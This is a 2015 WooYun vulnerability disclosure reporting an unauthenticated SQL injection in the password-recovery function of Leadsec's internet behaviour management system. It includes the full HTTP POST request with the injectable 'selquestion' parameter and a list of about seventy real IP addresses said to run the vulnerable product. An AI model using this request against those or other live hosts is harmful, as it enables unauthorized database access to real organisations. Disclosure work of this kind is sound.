当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119642

漏洞标题:网御星云上网行为管理系统存在SQL注入(无需登录DBA权限69案例)

相关厂商:leadsec.com.cn

漏洞作者: YY-2012

提交时间:2015-06-10 20:53

修复时间:2015-09-13 20:55

公开时间:2015-09-13 20:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-08-09: 细节向核心白帽子及相关领域专家公开
2015-08-19: 细节向普通白帽子公开
2015-08-29: 细节向实习白帽子公开
2015-09-13: 细节向公众公开

简要描述:

rt

详细说明:

网御星云上网行为管理系统“忘记密码”处参数过滤不严导致SQL注入。

POST /login.php HTTP/1.1
Host: 221.239.87.66:8443
Connection: keep-alive
Content-Length: 166
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://221.239.87.66:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: application/x-www-form-urlencoded
Referer: https://221.239.87.66:8443/default.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=e02f0ddf110a63c72d3d2174c66491bc
language=chinese&username=&pwd=&mode=findpwd&lang=&usbkey=login&find_username=admin&selquestion=2&txt_answer=aaaaaa&txt_newpwd=aaaaaa&txt_newpwdconfirm=aaaaaa&txtmac=


参数selquestion

漏洞证明:

aaaaaaaaaaaaa111111111111.jpg


aaaaaaaaaaaa2222222222222.jpg


aaaaaaaaaa333333333333.jpg


aaaaaaaaaaaa44444444444.jpg


aaaaaaaaaaaa55555555555555.jpg


案例:

https://124.200.188.138:8443/
https://58.16.9.70:8443/
https://202.109.133.191:8443/
https://218.24.200.250:8443/
https://58.16.4.134:8443/
https://218.75.58.198:8443/
https://218.77.84.135:8443/
https://122.226.140.44:8443/
https://117.40.195.61:8443/
https://125.67.228.188:8443/
https://58.42.233.163:8443/
https://220.197.215.123:8443/
https://58.42.251.179:8443/
https://58.16.4.246:8443/
https://36.7.150.224:8443/
https://218.65.95.138:8443/
https://218.87.233.88:8443/
https://58.16.9.46:8443/
https://59.49.176.208:8443/
https://218.62.89.201:8443/
https://218.92.161.194:8443/
https://221.224.19.252:8443/
https://218.75.205.148:8443/
https://125.89.61.16:8443/
https://58.16.34.26:8443/
https://171.34.72.52:8443/
https://218.65.3.134:8443/
https://122.227.169.62:8443/
https://120.44.125.117:8443/
https://123.7.177.196:8443/
https://221.13.0.210:8443/
https://222.171.187.113:8443/
https://221.224.16.211:8443/
https://116.55.170.111:8443/
https://122.227.195.6:8443/
https://122.224.86.139:8443/
https://222.75.166.245:8443/
https://59.175.175.82:8443/
https://61.164.73.194:8443/
https://61.177.237.204:8443/
https://58.210.97.54:8443/
https://117.44.242.70:8443/
https://58.16.26.190:8443/
https://61.133.192.29:8443/
https://218.61.132.158:8443/
https://113.107.52.236:8443/
https://58.16.4.186:8443/
https://125.68.138.11:8443/
https://111.42.225.174:8443/
https://218.10.44.200:8443/
https://219.149.221.226:8443/
https://61.178.102.93:8443/
https://222.184.121.94:8443/
https://222.86.132.146:8443/
https://117.141.113.162:8443/
https://60.171.137.167:8443/
https://114.104.164.173:8443/
https://180.213.4.221:8443/
https://219.159.80.242:8443/
https://220.197.207.246:8443/
https://123.52.133.6:8443/
https://58.16.26.130:8443/
https://58.222.245.130:8443/
https://58.16.2.98:8443/
https://218.5.251.253:8443/
https://58.16.1.174:8443/
https://61.133.219.98:8443/
https://59.175.175.82:8443/
https://222.184.121.94:8443/
https://221.239.87.66:8443/

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-13 20:55

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-10 21:56 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    呦呦切克闹

  2. 2015-06-16 09:29 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    为何忽略了

  3. 2015-09-13 22:00 | fuckadmin ( 普通白帽子 | Rank:476 漏洞数:39 | 千里之堤溃于蚁穴)

    @wefgod @YY-2012 这也忽略了,太坑了吧。